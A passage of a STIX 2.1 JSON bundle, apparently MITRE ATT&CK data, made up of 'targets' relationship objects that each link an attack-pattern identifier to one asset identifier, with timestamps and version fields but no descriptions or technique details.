"2024-07-01T10:37:15.825161", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825164", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41393072-3970-4dd5-b1c8-6638ffe57f31", "created": "2024-07-01T10:37:15.825172", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825174", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14989e37-64c5-4545-9a32-90a8b1023fd7", "created": "2024-07-01T10:37:15.825182", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825184", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a998d1ee-7b6b-4ce6-aebc-b26d286279fd", "created": "2024-07-01T10:37:15.825192", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825194", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--622ab851-31d6-4ef1-a36e-ace2176ca782", "created": "2024-07-01T10:37:15.825202", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825204", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e87dfc68-c540-4411-b031-0f46c2ae0d8a", "created": "2024-07-01T10:37:15.825212", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825215", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9cc929c2-0211-4575-8eac-b3101c89521c", "created": "2024-07-01T10:37:15.825223", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825225", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--42e076d8-a7d3-4a17-ad0a-62cb2b5ec19d", "created": "2024-07-01T10:37:15.825233", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825235", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--549d54e4-50af-4f2d-a025-46d01a7fdffd", "created": "2024-07-01T10:37:15.825243", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825245", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5ebec0a-c5f1-4448-afc2-922db3aec989", "created": "2024-07-01T10:37:15.825254", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825256", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6587d294-7c02-4963-bfa0-4c5993e91162", "created": "2024-07-01T10:37:15.825264", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825266", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2bc4e49-004b-4a33-ba34-f3fb79f14b4e", "created": "2024-07-01T10:37:15.825274", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825276", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6c3af6b-38fb-4c34-8e50-5f701e81c811", "created": "2024-07-01T10:37:15.825284", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825286", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d70e8b8a-3dfa-4ba5-bf1f-ef8e1d4e4666", "created": "2024-07-01T10:37:15.825294", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825297", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5aa1856-5fb6-43fd-ac3c-93c288e9b668", "created": "2024-07-01T10:37:15.825304", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825307", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9f1a6350-7082-4a06-9939-1b73b0fbb382", "created": "2024-07-01T10:37:15.825314", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825317", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6f1dbbb-9932-4243-89a6-24f7ef7f6fe8", "created": "2024-07-01T10:37:15.825325", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825327", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e472deb-b2c8-43b3-88d4-d4f5ec190fe3", "created": "2024-07-01T10:37:15.825335", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825337", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f99bc9f-2aef-4cf5-bc89-e41a62ca25df", "created": "2024-07-01T10:37:15.825345", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825347", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce086f1f-751c-4a81-8a82-91f37fb7e4c9", "created": "2024-07-01T10:37:15.825356", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825358", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--af6ab2f3-ed1a-4d85-b57a-87e797f37268", "created": "2024-07-01T10:37:15.825366", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825368", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a19969fd-6074-4f76-95d9-e5db08ae1697", "created": "2024-07-01T10:37:15.825377", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825379", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a5df736-5b7e-4fb0-aba7-265674630c60", "created": "2024-07-01T10:37:15.825387", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825389", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b8e5ad35-c158-4f86-bd20-1bdabfa488a5", "created": "2024-07-01T10:37:15.825397", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825400", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--33644682-91a2-4be5-95bd-1bcfbb22b3f5", "created": "2024-07-01T10:37:15.825408", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825410", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e10f3f2a-52ee-4fab-bb49-a05c20e9607f", "created": "2024-07-01T10:37:15.825417", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825420", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b9700ea-e8fa-4c2e-ada0-a0f75dfa0dbc", "created": "2024-07-01T10:37:15.825427", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825430", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4ca63df-58cd-468c-b6b5-03c287baf334", "created": "2024-07-01T10:37:15.825437", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825439", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--608463d0-b52a-41f6-adc5-ebba51e13205", "created": "2024-07-01T10:37:15.825447", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825449", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f16e26f0-93ca-4f7e-beec-815cc414dc35", "created": "2024-07-01T10:37:15.825457", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825459", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ac0f9e0-4a33-4111-ab94-b805f8cbcc3a", "created": "2024-07-01T10:37:15.825467", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825469", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cff777a9-f524-4eb6-8da0-e9ac2b509565", "created": "2024-07-01T10:37:15.825477", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825479", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--90729afc-24b5-499b-a8df-f968a584d60b", "created": "2024-07-01T10:37:15.825487", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825489", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--06cf1dbc-b79d-4595-a77c-720e6f9bc287", "created": "2024-07-01T10:37:15.825498", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825500", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--663b03a5-b1b4-4602-9cb8-33b8ca428ad3", "created": "2024-07-01T10:37:15.825508", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825510", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4986f0d7-300e-412a-8df3-cec8a5af86db", "created": "2024-07-01T10:37:15.825518", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825520", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eeafe140-4ce3-40de-a732-26fc80288dc4", "created": "2024-07-01T10:37:15.825528", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825530", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60c489cd-7b3d-4885-9fe4-5182ee315aeb", "created": "2024-07-01T10:37:15.825538", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825540", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e74f28f0-f61e-4d25-aade-3149c302fffa", "created": "2024-07-01T10:37:15.825548", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825550", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8c311be0-2804-4a37-942d-5e9f58427a65", "created": "2024-07-01T10:37:15.825558", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825560", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6310de40-5a66-42a2-af86-d29b33ecd47e", "created": "2024-07-01T10:37:15.825568", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825570", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--463dde4d-8e8b-4a5f-a05d-beeab98703a6", "created": "2024-07-01T10:37:15.825578", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": 